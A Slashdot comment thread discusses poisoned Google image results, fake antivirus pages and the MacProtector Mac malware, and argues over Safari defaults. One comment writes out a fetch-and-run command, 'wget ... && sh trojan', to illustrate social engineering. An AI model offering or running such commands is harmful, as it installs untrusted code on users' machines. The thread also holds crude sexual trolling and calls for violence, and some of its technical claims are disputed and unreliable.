DeviantArt has been hit with a rash of ad-delivered mal-ware, particularly through PDF exploits. The site has officially stated that their ad agencies are responsible, they "try" to get good ad agencies, but at the end of the day, you need anti-virus software on YOUR computer and there's not much DA can do about it. That's BS. The ads have been serving mal-ware for years, so whatever action their taking to get good ad services and dump bad ones obviously isn't working. If they don't take mal-ware seriously, what will they do if the ads start leeching my notes and my passwords?

Technically, JavaScript only needs better scope to help control the 1st party vs 3rd party problem. The rest is up to browser security policies, which are equally horrid, and none of the browser vendors seem to care. JavaScript and DOM were implemented in a hurry to offer stupid tricks and dynamic content. Security was never considered, and today is outright ignored on purpose.

Re:web 101: don't run unknown javascripts

[Mana+Mana]

> Turn Javashit on, and clicking the tab works just fine

Dunno about any of that---although I requested Giorgio over a 18 months ago to provide a allow google script locally to their properties, NOT on the entire Net, he mentioned some shiz, but I don't know WTF he was talking about, Google scripts still fire around the whole fucking web for me, AND requestpolicy? is so fucking ham-handed for me that I have it but never used it again since the initial install over a year ago---but they motherfucking lost me on Google News.

I used to have it as my browser start page, and I used it constantly, not anymore. Not since they required cookies to REMEMBER modifications to revert to the old double column format. I like my shit sorted fuckers! Not a runon fucking pile of headlines. Anyway all these complaints are wasted, I'm sure they read them, but don't shit about them. My anger and profanity are proportional to my love lost and betrayal. =) And if you're drinking at home ... fuckers!

Re:web 101: don't run unknown javascripts

[mmj638]

It's 2011. Javascript is not optional for the web anymore.

Javascript is also not the problem. It's insecure server-side code that's the problem. XSS is not a Javascript vulnerability, it's a vulnerability with the server side. Javascript is just an actor, not the protagonist. Untrusted Javascript is let onto a server only if the server or its server-side application code is insecure.

Re:web 101: don't run unknown javascripts

You're on drugs, right? Drunk? Or just stupid?

Re:web 101: don't run unknown javascripts

for one, not running explorer 6 as administrator is a good start.
then you can survive drive by attacks even without having to manually turn on and off javascript for every page you're visiting.

chrome + seven + no privileges is pretty safe and even my granddad can use that. do you know how many help call would I receive if I try to go noscript on parents and friends?

but, if you're instead worried about tracking, then that is thin foil hat area and there is nothing better than noscript for presumption of privacy.

try this with noflash and noscript and see how much anonymous you are:
http://panopticlick.eff.org

Re:web 101: don't run unknown javascripts

[AnnaZed]

I am going to have the second that. After reading this post I installed the NoScript add-on yesterday even though I haven't actually had any problems. I have seen potentially toxic links in Google image searches (and in regular searches as well) but they are pretty easy to identify so I just didn't follow them from the search page. Anyway, 24 hours of NoScript was enough of that (thank you very much). I have to do internet searches for work and monkeying around with that thing would (literally) make the task take up to three times longer. With NoScript what you get is what someone upthread called "an ugly broken thing." I don't have the time or the patience to click through the many options that NoScript offers for each and every page. While it is interesting how much crazy script there is out there in the world attempting to control each and every incidence of it by hand is absurd. Incidentally, I found the uninstall instructions on the NoScript help page http://noscript.net/faq#qa2_3 where they basically call you an idiot for uninstalling their obnoxious, time consuming and esthetically unappealing add-on to be a bit insulting; not to mention that the NoScript home page itself is studded with script and looks like something from 1991. NoThanks

Re:web 101: don't run unknown javascripts

[Uzuri]

This was true earlier this month, but they appear to have fixed it.

Now the fact that google maps now requires cookies to work pisses me off...

So...

[Mashiki]

Can we scrap the entire js system now and rebuild it from scratch so it stays inside a fucking sandbox this time?

Re:So...

[larry+bagina]

This "attack" uses javascript to redirect. If javascript can redirect, a sandbox won't help. If javascript can't redirect, a sandbox isn't necessary.

Re:So...

[ChunderDownunder]

Ummm... Isn't specifying what actions a script can perform the definition of a sandbox?

accessing the filesystem, launching popup windows, transmitting content outside of the original domain, redirection, cookies, etc.

These are all permissions that should be codified by the scripting engine's security manager and configurable by the end-user on a site-by-site option.

Re:So...

[larry+bagina]

I can ask javascript to suck my cock all night long, but it doesn't. Even in browsers without a sandbox.

Re:So...

Reminds you of this?

Neo: What are you trying to tell me? That I can dodge bullets?
Morpheus: No, Neo. I'm trying to tell you that when you're ready, you won't have to. ..

HTML5 is that js system, or Web 3.0 which you covet. Soon, we will have to worry about disabling it too... but currently there is NO way in any browser to deny the rogue developers the devastating browser-side power that only plugins used to be able to have back 15 years ago.

Re:So...

[Billly+Gates]

The difference is marketers use SEO to trick Google to give them high rankings. Malware writers use it too so an unrelated picture to your search can manipulate Google into displaying the page.

Re:So...

Can we scrap the entire js system now and rebuild it from scratch so it stays inside a fucking sandbox this time?

You mean how java virtual machine is meant to be?

Re:So...

Not sure why we don't sandbox the entire browser process. Have the browser think it has a file system using a dummy filesystem, and that's that. If you need to save a web page, save it to the dummy filesystem, then copy from there to the main one if need be.

Use an alternative search.

[Deathlizard]

At this point, I feel SEO poisoning is so bad on Google that I find myself using other search engines more since they don't seem to be as big of a target.

Altavista, Ask and Bing have just been giving me more relevant search results lately. Google seems to like to show more SEO sites, forum reposters that just repost the same forum entries over and over and "Meta Search" sites such as software informer and alibaba.

Image search Rogueware poisoning is yet another reason to start looking somewhere else for search results.

Re:Use an alternative search.

[Pseudonym+Authority]

Altavista, Ask and Bing have just been giving me more relevant search results lately.

Somewhat interestingly, and wildly offtopic, Altavista is powered by Yahoo, and Yahoo is powered by Bing, so you are really only using at most 2 search engines. (Ask also outsources to someone, but they don't say who, so it may very well be M!r0$0f+ as well).

Re:Use an alternative search.

[VortexCortex]

Image search Rogueware poisoning is yet another reason to start looking somewhere else for search results.

CORRECT. The more people stop using Google, the better their search will get -- They surely prioritize things; If everyone is displeased but keeps using their product out of habit then it's not as big of a priority. If they start losing lots of visitors over it then it will get fixed.

Re:Use an alternative search.

You can easily block any site from appearing in your Google search results.

Re:Use an alternative search.

[Undead+Waffle]

Altavista, Ask and Bing have just been giving me more relevant search results lately.

Somewhat interestingly, and wildly offtopic, Altavista is powered by Yahoo, and Yahoo is powered by Bing, so you are really only using at most 2 search engines. (Ask also outsources to someone, but they don't say who, so it may very well be M!r0$0f+ as well).

And Microsoft copies Google's search results so in the end everyone is just using Google!

screenshots

[cobbaut]

Two weeks ago I put some screenshots of what it looks like on my blog:
http://cobbaut.blogspot.com/

Re:screenshots

I tried the link. An image displays as expected and... nothing else.

NoScript is the best plugin ever!!!

Re:screenshots

Two weeks ago I put some screenshots of what it looks like on my blog:
http://cobbaut.blogspot.com/

Cool, I was worried my OS was bought out by Microsoft and they gave me a C: drive

Re:screenshots

[MBCook]

I saw that particular trick when someone at my office ran into it about a year and a half ago. I realized what it was (they thought it was real) so I decided to try an experiment...

I pulled up the address on my iPhone and got the same thing. It looks really neat to see an iPhone show Windows Explorer and run a fake virus scan.

I was very impressed though. It's a quite convincing simulation, much better than the old generic "Your computer has a virus" image pop-ups with flashing text.

Re:screenshots

[bmo]

I've seen it. It detects Chrome and puts up a fake Chrome screen.

The problem is that the dialog is modal and steals focus from Chrome. You can't simply close the tab. So you click, it does its "scan" and gives a heads-I-win-tails-you-lose dialog and you click that and you wind up downloading a windows executable, and that's when Chrome finally steps in and says "hey, this is an executable file, do you really want this?" and that's the only place you can say no-thanks.

The only other solution is to force-kill (kill -9) the entire Chrome window at the start.

Chrome should allow you to close a tab and anything else attached to it, at any time. The current situation is unacceptable from a user's POV.

I did this in Linux, but having wine installed means that this could be a vector for malware in Linux, too, with a little more work.

inb4 "but no malware writer cares about linux" and "hurr, wineserver is a user process, so it makes no sense to have autorun malware as a user" (as if anyone ever checks his .bashrc or .profile). The only thing I see as a barrier to this foolishness is the relative intelligence of your average Linux guy (me) versus the typical Windows user in deciding not to run something thrust at the browser for download from a bad website.

--
BMO

Re:screenshots

Damn, I tried the badware link on my jailbroken iPhone and it actually downloaded a file and tried installing a debian package...on my PHONE.

What the fuck man.

Re:screenshots

[Barbarian]

Chrome should allow you to close a tab and anything else attached to it, at any time. The current situation is unacceptable from a user's POV.

Chrome? Can't you use the Shift-Esc built in Chrome task manager and kill the window?

Re:screenshots

[bmo]

What ordinary user knows about the Chrome task manager?

Remember that I'm trying to look at it from a "joe user" perspective, not an expert's perspective. Granted I said "kill -9" there but that was to illustrate the point that an ordinary user has no way to really back out once the script has started to operate, and that starts as soon as the person navigates to the page.

--
BMO.

Re:screenshots

I came across the same thing on Firefox, like GP and had to clean the PC. Later, I got tired of even Yahoo being capable of stealing focus from my browser just to say that I signed in from another PC and decided to take action. Googling led to a supposed fix that never worked for me on FF 3. I do not understand why devs refuse to give us control of our open source browsers. A simple control statement in their C++ and one more tickmark in their complex preferences is not going to take a whole decade to implement... oh, wait, it already has.

I'm tired of losing browser sessions to kill -9 simply because FF and Chrome have no way to single out a tab to a process number for the JS dialog --even more code would be needed, but these are the same browser devs who wasted time with status bar replacements and crazy new GUIs instead of long-ingrained problems.

We must realize that a lot of people are stuck in the same dilemma of Windows newbs: the current choices suck but there is no alternative that is painless. If the alternatives are attractive, they have intense drawbacks and derision. Ergo, switching to MacOS or Linux is just as painful as staying with the devil they know. I hate all major browsers for different reasons, and FF / Chrome are what I regretfully use. We have already lost.

Re:screenshots

I pretty much just go into Windows Task Manager when Firefox pops up one of these popup windows from clicking on an image link and kill the process, instead of clicking on ANYTHING at all.

What's weird is I'll go into a Linux VM, wget the html page that tried to poison me... and find no JavaScript, no advertisement links, nothing in it. At what point does the poisoning happen? I thought it was a worm spreading to web servers.

Last time I remember this happening was Google image searching "Bobby Fischer" (the racist dipshit fucktard... er, I mean, chess genius), and it was the very first damn image, too.

Re:screenshots

[1729]

Chrome should allow you to close a tab and anything else attached to it, at any time. The current situation is unacceptable from a user's POV.

Chrome? Can't you use the Shift-Esc built in Chrome task manager and kill the window?

Actually, I just tried (Chrome on a Mac), and I couldn't kill the window through the Chrome Task Manager. Nothing I tried work: I either had to force-quit the browser or just click "OK" and let it run through the fake scan and download the .exe. I'm annoyed that Chrome doesn't seem to provide a way to block javascript hijacking (other than disabling javascript entirely or through explicit whitelists/blacklists). I don't EVER want a web page to be able to disable my right-click, back button, history, view page source' option, etc., all of which this popup did.

Re:screenshots

[perryizgr8]

and had your phone been an n900, it might have actually gone on and gotten installed!

Re:screenshots

[PhunkySchtuff]

Not only does that link still work after being reported, but it seems that they've crafted a Mac version of the page as well. Going to that link from Safari on a Mac launched a Finder-like window reporting all these issues with my machine, as well as downloading anti-malware.zip and I'd say it would be enough to fool a non-technical user for sure.

Re:screenshots

[jimicus]

I let it complete downloading, the zip file contains a Mac application called MacProtector and it fires up an installer immediately.

In other words, it's started. Mac users can't be complacent any more.

Re:screenshots

[jimicus]

Replying to myself, but I pushed the file through VirusTotal (which runs suspect files through a whole host of AV engines). Somewhat depressingly, most of them didn't catch it.

The results are here if anyone's interested.

Re:screenshots

Just checking, does Shift+ESC for Chrome's task manager work when you get one of these?

I haven't actually come across one of these pages yet, but it would be nice to know ahead of time. :)

Re:screenshots

[currently_awake]

It's a shame you can't get hold of the source code and add that feature, it would solve all your problems! We could even give such software a special name so people will know they have that option- something about being open i expect.

So...

[__aaqvdr516]

Since they're detecting Google, Bing is safe? Wouldn't Bing pretty much slurp the same data while crawling and display pretty much the same result?

Violence is required

[erroneus]

The people who are doing this are criminals. They need to be stopped. It's as simple as that. Follow the money and beat the crap out of them until it stops.

Re:Violence is required

[Corse32]

Hell yeah, let's just do it man... it sounds straightforward enough... Sounds like in an old western, the malware monetizers are the baddies in black robbing trains, and we can be the posse of marshalls tracking them by analysing their leavings. I'm going to call this goodie gang: "Literally *all* of the best hackers /in the world/ (who aren't criminals)" Our motto will be "Cyber bad guys - they need to be stopped"

Re:Violence is required

Hail yeh dawg!!!

Re:Violence is required

[MrL0G1C]

Or VISA, Mastercard, Paypal et al. should be held to account for passing on money to these obvious fraudsters, All to quick to cut off Wikileaks weren't they - two-faced bastards.

Re:Violence is required

What is wrong with you people? Do you really think that violence is the solution for every problem? Have you not learned that violence leads to more violence? No wonder the world looks like it does when people thinks like this.

Re:Violence is required

I'm too lazy. Can I install an app which does the following and beating for me?

Re:Violence is required

[erroneus]

What you are seeing is a lack of respect for others. At its core, respect is fear. Without fear of retribution or consequences, there can be no respect. I believe the short of it is that these situations are increasing in complexity and in boldness. But in the end, there is a path for money to move which can be followed. (There are no cash transactions here.) There must be punishment. And in the lack of proper government action, what else is there?

If I could send "poison money" I would.

Re:Violence is required

[dominious]

The people who are doing this are criminals. They need to be stopped. It's as simple as that. Follow the money and beat the crap out of them until it stops.

This is Slashdot. Let me just show to you what is going to happen if we try that: http://www.youtube.com/watch?v=93w0UgfX8jQ

Re:Violence is required

[eriqk]

What you are seeing is a lack of respect for others. At its core, respect is fear. Without fear of retribution or consequences, there can be no respect. I believe the short of it is that these situations are increasing in complexity and in boldness. But in the end, there is a path for money to move which can be followed. (There are no cash transactions here.) There must be punishment.

Spoken like a true gangster.

a couple add ons that help

[d6]

I surf with requestpolicy and noscript up. It is utterly amazing the number of websites that can't render a page without firing scripts or loading content from 6, 8, 10 or more different domains.
If you haven't tried these, do it and be amazed at how many sites load without stylesheets, pictures etc. It's amazing how badly shit is implemented - zero thought about graceful degradation.

no script
requestpolicy

Re:a couple add ons that help

[Runaway1956]

I just run AdBlock Plus. The newer versions include anti-XSS. A guy can load Firefox with to many addons, after all.

Re:a couple add ons that help

[Low+Ranked+Craig]

Not zero thought about degradation and not bad implementation. This isn't the same as developing for IE for example. It's simply that implementing features two ways - one for JS and one for no, takes more than twice as much effort, so it doesn't get done. I've told clients before about the JS issues, but what it comes down to is the client doesn't want to spend twice as much to service the 2% that turn off JS. Period. They get a message that tells them to enable JS to use those functions. It's cost vs. benefit 101.

Re:a couple add ons that help

[nonregistered]

Same here: no script & requestpolicy. The amount of tweaking required to surf safely tends to make me visit less than a dozen sites regularly.

Re:a couple add ons that help

[d6]

I say "zero thought" and "bad implementation" because very few of the pages I see rendering like shit add the what? 3 lines? of html and javascript required for a "no script" notice. I suspect it is less a reasoned choice to throw 2% of your traffic overboard than a lack of knowledge.

Re:a couple add ons that help

[hedwards]

Which is really why companies need to be held accountable for exploits in their code rather than being allowed to require that somebody else pay for their incompetence. It worries me a great deal how many sites don't use https for log ins or insist upon not giving users a way of getting in without Flash.

I'm sure we'd see serious movement quickly if all of a sudden they were themselves responsible for their actions or inaction as the case may be.

Re:a couple add ons that help

[Low+Ranked+Craig]

If that's what you mean then I tend to agree. I always put noscript tags in place if there is functionality that wont work without JS, and I always test for cookie support and tell the user that cookies are required rather than breaking things, or at least they will know why things aren't working.

But still, for most companies, anything more than that just isn't worth the effort for the 2%. THere are a lot of huge sites that don't even do that, they just break. And I do mean huge...

Re:a couple add ons that help

[Low+Ranked+Craig]

I agree. I have a few clients that have not popped for an SSL cert for their site and have people loggin in in the clear. I've explained it to them in detail, in writing. I don't get it, but there you go...

Re:a couple add ons that help

This page looks a lot better with noscript and requestpolicy enabled!

Re:a couple add ons that help

[Jon+Stone]

It is utterly amazing the number of websites that can't render a page without firing scripts or loading content from 6, 8, 10 or more different domains

You can partially blame Google for that - "Serving resources from two different hostnames increases parallelization of downloads".

Re:a couple add ons that help

I used to work in security for a time, and until something actually happened which would necessitate more training or better equipment, we wouldn't get it. Then something would happen for which we weren't trained and they'd spend too much money rectifying the situation. Same goes here, as long as it's a potential cost rather than an actual one, they'll ignore it.

Slashdot Promoting Plagiarism

[lee1]

The summary contains two links. The first is to an article that plagiarises the second, padding the lifted paragraphs with barely intelligible proto-English. What a disgrace.

Mac is vulnerable too

[Teckla]

My wife got bitten by this just today.

She navigated to a web page from a Google search result, and Safari automatically downloaded some malware and executed it.

I didn't believe my wife's story at first, so I tried it. Sure enough, automatic download and execution on Mac/Safari.

What the fuck, Apple and Safari?

The only question that remains is whether I'll be moving her to Firefox or Chrome...

Re:Mac is vulnerable too

[larkost]

It did not download and execute, it downloaded and opend the installer. Your wife would have had to go clicking through a an installer, and provided her admin credentials, in order to have installed/run something.

While this is bad behavior, and will probably finally convince Apple that .pkg should not be on the list of auto-launched items, this is also not the "sky is falling" situation that your post makes it out to be.

Re:Mac is vulnerable too

[slyborg]

Turn off "Open Safe files after downloading" in Safari Preferences. (-_-)
Chrome is definitely faster, but doesn't have NoScript and uses more RAM.

Re:Mac is vulnerable too

The same thing happened to me. I told your wife she was cute (a white lie if ever there was one!) and then I fucked her. If you want to try it for yourself, you can watch me next time I fill her pussy with baby batter :-)

Re:Mac is vulnerable too

For some time back in the Tiger / early Leopard days, Safari was set to automatically open downloads (the option to disable it is in preferences). Apple realized the huge security issue this was, and changed the default, but depending on how you've updated your Mac since then, Safari may still be set to do that.

The short version: Macs don't do that anymore (by default) and haven't for a while. =P

Of course...on a Mac, the malware isn't going to be doing too much without admin privs, so there's that at least. =)

Re:Mac is vulnerable too

[jo_ham]

What was the link? What was the malware?

I want to test this.

What happened? I am assuming it downloaded an actual executable Mac application - by default Safari *will not* open these without your express permission, and then the system will also ask you for certain filetypes downloaded from the internet whether you really want to run them - the metadata logs the originating site.

What *exactly* executed, and what was the result?

I would be interested to know what malware got past, and what her settings in Safari were.

Re:Mac is vulnerable too

[Teckla]

It did not download and execute, it downloaded and opend the installer. Your wife would have had to go clicking through a an installer, and provided her admin credentials, in order to have installed/run something.

Sorry, I'm not a Mac expert. All I know is that it automatically downloaded something, and automatically executed something. I'm not technically knowledgeable enough about OS X to know that, even though we immediately exited the malware installer, that nothing bad could possibly have happened.

And I'm still not convinced the malware installer didn't do something bad before it popped up its first GUI window. I'm not accusing you of being a liar, but my wife uses her Mac to access our bank accounts and such. I have no choice but to nuke the site from orbit (reinstall OS X). I'd like to trust that because someone on the Internet said I'm safe and not to worry about it, that I can just plain not worry about it, but I just can't take that risk.

At the end of the day, Apple/Safari's amazingly fucked up defaults burned us good and hard. It'll take me days to fully reload and reconfigure her machine.

Thanks, Apple...

Re:Mac is vulnerable too

[Low+Ranked+Craig]

Sorry, I don't buy this. Please post the offending link. It might have downloaded and mounted a DMG, but default settings do not allow for auto installation.

Re:Mac is vulnerable too

[Teckla]

What was the link? What was the malware?

I'm sorry to say I no longer have the link. I can tell you my wife was searching for something to the effect of "fairy wings" or "tinkerbell wings" with my young daughter, and that the link she ultimately clicked on was a .ms address. That might help you hunt down the same link, since this happened less than 8 hours ago.

What happened? I am assuming it downloaded an actual executable Mac application

I don't recall the exact thing it downloaded, but I recall it ended with .mpkg and was actually a directory I was able to navigate into using Terminal.

It automatically popped up some kind of installer for MacProtector, which is apparently malware (based on my Googling). I'm pretty good on Windows and Linux, but I know next to nothing about the Mac. I'm not aware of any really low level geekery details like "Mac installers are always 100% safe! Just cancel out of them!" or anything like that. I'm confident it didn't have root access, but even with just my wife's login credentials, my suspicion is that it could have done a lot of damage.

What *exactly* executed, and what was the result?

She clicked on a Google search result. The Downloads dialog box popped up. It downloaded something almost too quickly for the eye to see. Some kind of malware installer than displayed a GUI. It looked like the very first step of the installer. There was a Continue button.

I would be interested to know what malware got past, and what her settings in Safari were.

I'm sure her Safari settings were almost entirely set to their defaults. The Mac is supposed to be the "safe" computer. Or so we thought...

I'm sure the Slashdot crowd will come down hard on me over this. I fully expect my intelligence to be questioned and to be modded into oblivion. But really, I don't see how an average user should respond to this except to assume the worst and reinstall OS X.

And I really do blame Apple for setting absolutely bone headed defaults on Safari.

Re:Mac is vulnerable too

[armanox]

Not sure if this is what they ended up with, but see the blog post linked in this post that goes to it. Warning - Windows boxes are also very vulnerable to the same link.

Re:Mac is vulnerable too

[techtech]

Safari / Mac OS X latest versions as 08.05.2011 CET As I happen to use the Google image search a lot, and open each image (from google results) in a tabs (collect them) and after that reviewing them. Today I searched for different architecture related things and managed to open this this FAKE AV page, a lot of times, differnt pages. And the file that is downloaded is "anti-malware.zip" [1,9 MB on disk (1 872 571 bytes)]. This file contain "MacProtector.mpkg." I am sure I do not have the default settings, because I review every programs settings before I am starting using it, as a common proceedure. I have the open secure files automatically option off, it was not opened. As far as I know Safari does not consider a zip a secure file, and there is not an automatic execution of mpkg inside a zip as standard?

Re:Mac is vulnerable too

[jo_ham]

No, Safari won't execute a an .mpkg as standard - that's an installer file and would require other user interaction (clicking next etc) to step through, and your admin password if it was going to go outside your home folder at all. So if you don't fall for the social engineering you can stop it at that point.

It looks like it must be a trojan of some kind, but no different to any standard trojan: you have to have the user install it.

Re:Mac is vulnerable too

[jo_ham]

It sounds like a trojan of some kind. By default (and Safari had the default options changed a few versions back - I can't remember if it was to be off by default or by on, mine is set to "off"), and while it will treat a zip file as ok to decompress and a disk image similarly (it will mount them with that checkbox on), the .mpkg is an installer package, rather than the trojan itself and as you saw you need to step through it manually (and provide admin password if it goes outside home) to get it to install - a social engineering problem.

Now, I definitely think it is a bad idea for Safari to decompress zip archives and mount disc images by default - with the setting for "safe" files off, while it might download it would not go beyond that.

I do not agree with Apple that .zip should be considered a "safe" file.

Re:Mac is vulnerable too

[TangoMargarine]

Isn't it disingenuous to criticize Apple for putting you into a situation that you have decided is unfalsifiably dangerous?

Re:Mac is vulnerable too

[TangoMargarine]

I was dope and fell for one of those "we have an invoice about a package that you ordered about to be delivered to your home" emails a month or two back. I downloaded the zip file, cracked it open, and ran the file before I noticed it was an exe, NOT a pdf as the icon suggested (this after me being one of those people who gets disgruntled about the system default in all the comp labs being to hide file extensions and telling multiple people about why this was a bad idea). After running a few different disinfectant programs on it, everything seemed to have cleared up and as far as I could tell my computer was back to normal.

Cut to this morning, when I booted up to have the thing suddenly reassert itself from out of the blue and start "scanning for infections" again. At that point, I said "fuck it" and reinstalled Windows. I'm a CS major, but I don't want to spend the time to find a definite way to prove to myself that my system is clean that's better than asking the other CSSE people what they use, running said program(s), and taking it on faith that when they tell me "you're clean," I actually am.

So to conclude my previous post, yes the situation sucks, but I don't see how it's particularly Apple's fault. As they like to say here on Slashdot, a lot of Macs' security isn't inherent, it's due to its smaller market size, and they've had articles about how they're being targeted more now, so hey...

Re:Mac is vulnerable too

[cathector]

i've been on osx for about two years, and just yesterday had my first malware experience,
which is pretty much identical to Teckla's: i was in safari and followed a GIS link for "blanket octopus"
and clicked on one of the pictures, and got a pop-up browser with some "security scan in progres.." BS dialog.
no big deal.
but then the OSX package installer opened up, trying to install some obvious malware .mpkg which had been downloaded to my desktop.
downloading a file without my permission is already a total security fail, imo, but running the installer on it is beyond bad.
obviously i nixed the installer and power-cycled and so far haven't noticed anything untoward, but it's scary.
the name of the .mpkg was "MacProtector.mpkg". unfortunately i rm -rf'd without making an archive of it.
- google shows a few hits for that. so, in short, yeah, Teckla's experience matches mine.

Re:Mac is vulnerable too

[cathector]

i had a very similar experience yesterday. was GISing in safari for "blanket octopus" and suddenly the osx installer was running. the offending file was also MacProtector.mpkg, which had been downloaded to the desktop.

Re:Mac is vulnerable too

[techtech]

So there is not any sensational about this. The zip, unzips on a "unsecured" computer (opens "safe" files), but you have to run a mpkg manually that resides in your download folder, little chance that this happens, if the user are not aware of what a mpkg is anyway. Safari gives you few indications other than the download manager that a file is downloaded.

Re:Mac is vulnerable too

[hedwards]

So, they disabled the preference, but didn't remove it completely? I'm sorry, but that's just not responsible. There are some things which the user should have to do without help. If he wants to open the file, fine, but automatically opening random files that have been downloaded isn't something that should be allowed, with or without the users approval.

Re:Mac is vulnerable too

downloading and mounting a DMG will appear to a naive user as if the program has installed something.

so oh mac apologist, why is downloading and auto-mounting a DMG allowed?

Why is downloading [and ANYTHING] allowed? It should download, period, nothing else, no exceptions, no _fucking_ exceptions.

I _want_ to be able to be FASCIST about what the internet does.

Re:Mac is vulnerable too

[Teckla]

Isn't it disingenuous to criticize Apple for putting you into a situation that you have decided is unfalsifiably dangerous?

I did Google before I panicked too much. There is, so far, not a whole lot of confident sounding information on MacDefender / MacProtector.

If it was splattered all over the Internet that it's safe to cancel out of the installer and go on your merry way, that's probably what I would have done.

In any case, how can anyone seriously defend Apple for Safari defaults that automatically download something and run an installer?

Seriously, you have got to be kidding me. Apple fucked up bad on this one, and should be called out for it. How can you not criticize Apple for this?

Re:Mac is vulnerable too

MOD +5 TRUE DAT, TRUE

Re:Mac is vulnerable too

Yay for Firefox 4.0.1 and NoScript. I didn't notice anything out of the ordinary, apart from an ugly page trying to set a handful of cookies I wouldn't accept.

Re:Mac is vulnerable too

[Billly+Gates]

I am not a mac user. However, I know how buffer overflows work.

All you need to do to run code on a platform with security or not is to simply trick a program to run to a specific ram address to execute the data. The kernel can't catch this program is already running.

A way to do this is to download the executable code as data. Then somehow use an exploit in JavaScript or Safari to read a particular address and BAM!

Images are stored as data but have the ability to execute code as well.

The only time the OS does a check of its UID or an ACL (Windows) is when the program makes a request to the kernel via an api which in turn decides whether the program can run. If the exploit has its own code this function is never called and its simply bypassed.

Re:Mac is vulnerable too

Unlike windows, mac provides program installation as an OS service. An mpkg is an installable file, not an installer. The malware was not running it's own code, it was triggering the operating system's installer feature. Until you allow the OS to install the program nothing is going to happen to your mac. For sure it's arguably bad that safari automatically asks you to install a random program from the internet, but it's not running untrusted code - it's asking you whether you want to trust (and install) this code.

Re:Mac is vulnerable too

[perryizgr8]

yeah right, and guess what? ie and windows defaults also do not allow auto-installation of executables.

Re:Mac is vulnerable too

[Billly+Gates]

This is a new JavaScript exploit.

More detail about it is here?

It turns out this one targets those shopping for particular patterns and is unique in that it infects both Macs and PCs. Yes Apple fanbois your machines are not perfect and 100% invulnerable.

Re:Mac is vulnerable too

[perryizgr8]

i decided to be a little adventurous and opened the link on ie9/win7. brief glimpse of google image seacrh and then a 404 error.

Re:Mac is vulnerable too

[stiller]

So basically you are blaming Apple for a default setting which resulted in a completely harmless situation which prompted you - without referencing anyone on the matter - to reinstall OS X?

In other news: I just noticed a blinking light on my dashboard, so instead of calling my car dealership, I just assumed the worst and torched the car.

Re:Mac is vulnerable too

[houghi]

Not a Mac issue, but a user issue. If I can convince people to do the following under Linux AND follow instructions, does that mean Linux is not safe?

wget http://houghi.org/trojan && sh trojan

Obviously I (or anybody else) could include different code.

Re:Mac is vulnerable too

[PhunkySchtuff]

It did not download and execute, it downloaded and opend the installer. Your wife would have had to go clicking through a an installer, and provided her admin credentials, in order to have installed/run something.

Sorry, I'm not a Mac expert. All I know is that it automatically downloaded something, and automatically executed something.

What it did was automatically download a zip file. The default option for safari is to open "safe" files after downloading, and this includes zip files. Yes, this option is bad in my opinion, but it's relatively safe. Safari will not open up a .pkg file automatically.

After Safari downloaded and unzipped the zip file, you would then have ended up with a file in your ~/Downloads directory - the case I've seen is MacProtector.mpkg which is an installer package that has to be double-clicked on to launch and then this software needs an Administrator password to be entered. If you're not an admin user, you will need to enter the username and password of an administrative user to proceed, if you are running as an admin user, you just need to enter your password. If you are running as an admin user, I'd suggest you stop this straight away, this more than anything else will help keep your computer secure.

This software comes from somewhere in Russia (there are ru.lproj files in the package and no en.lproj as you normally see). Once you have the software on your machine, it can be quite difficult for a non-technical user to clean up, but it's not incredibly difficult (kill the processes and trash the app)

Just to recap though - Safari did download a file to your wife's computer. Safari did automatically unzip the file (or extract it from a dmg disk image if that's how it was distributed). From this point onwards though, it's the user's fault the software was installed. They would need to double-click on the downloaded installer and then enter an administrator's password to continue to install the malware.

To be fair, the web page I saw this on pops up a new browser window that has either a Windows or Mac (depending on your platform) specific layout - the Windows one looks similar to My Computer and the Mac one looks like a Finder window. This window then runs a "quick scan" that tells you your computer is infected and the downloaded file will, of course, remove this infection.

At the end of the day, a user's blind insistence to open an unknown installer and install this software with their administrator password burned you good and hard. It'll take minutes to force-quit the process and delete the offending app (although, had this been installed on my machine, I'd nuke from orbit too, just to be sure)

When you're rebuilding your wife's Mac, make an admin user when you first boot the machine. Then make a regular user account that your wife uses for her every-day usage. Finally, go into Safari > Preferences > General and untick Open "safe" files after downloading

Re:Mac is vulnerable too

[Andreas+Mayer]

From this point onwards though, it's the user's fault the software was installed. They would need to double-click on the downloaded installer and then enter an administrator's password to continue to install the malware.

This is wrong. The installer is opened automatically.

Of course it won't proceed without user confirmation. So no real harm done.

Re:Mac is vulnerable too

[Andreas+Mayer]

and automatically executed something. I'm not technically knowledgeable enough about OS X to know that, even though we immediately exited the malware installer, that nothing bad could possibly have happened.

It executed the system's installer application. Nothing bad could possible have happened up until that point. You will have to at least click a button to have anything installed. In many situations you will additionally be required to input your system administrator's name and password.

And I'm still not convinced the malware installer didn't do something bad before it popped up its first GUI window.

If you didn't acknowledge the installation, no foreign code will have been executed.

I have no choice but to nuke the site from orbit (reinstall OS X).

That's totally unnecessary.

At the end of the day, Apple/Safari's amazingly fucked up defaults burned us good and hard.

It didn't. It was you who decided not to trust the system.

Re:Mac is vulnerable too

[Andreas+Mayer]

Yes Apple fanbois your machines are not perfect and 100% invulnerable.

Um. What are you talking about? I will still have to actively acknowledge the installation of said malware.

Of course, if you include the situations where the user willingly installs the malware himself, there can be no system that is open (as in you may install what you want) and secure at the same time.

Note that I don't think my machine is perfect and/or invulnerable. There will never be a perfect system in this world. And Apple has to patch security problems all the time. Still, this malware is no real threat. It's just another form of social engineering.

Re:Mac is vulnerable too

[Andreas+Mayer]

but automatically opening random files that have been downloaded isn't something that should be allowed, with or without the users approval.

I disagree. It's a very convenient setting and I have never seen a situation where anything bad happened.

Just now I had that nice malware discussed here open the installer. Cute. I closed it and trashed the installer package.

(It seems to be from russia and will try to execute the malware after installation. Didn't investigate further.)

Re:Mac is vulnerable too

[Andreas+Mayer]

No, Safari won't execute a an .mpkg as standard

It will. Actually, it just did for me. It unpacked the zip file and automatically started the installer by opening the mpkg.

Still no problem unless you decide to continue with the installation.

Re:Mac is vulnerable too

[Andreas+Mayer]

but you have to run a mpkg manually

No. The system will do that for you. I just tried.

Re:Mac is vulnerable too

[Andreas+Mayer]

obviously i nixed the installer

Good.

and power-cycled

Why would you do that?

Re:Mac is vulnerable too

tell your wife to stop browsing sketchy porn sites; the only time someone tried to send my mac malware was on a hardcore bsdm site, haha.

Re:Mac is vulnerable too

[Teckla]

So basically you are blaming Apple for a default setting which resulted in a completely harmless situation which prompted you - without referencing anyone on the matter - to reinstall OS X?

It's harmless for Safari to automatically download and execute installers? That's not supposed to concern users that aren't overly geekly familiar with OS X?

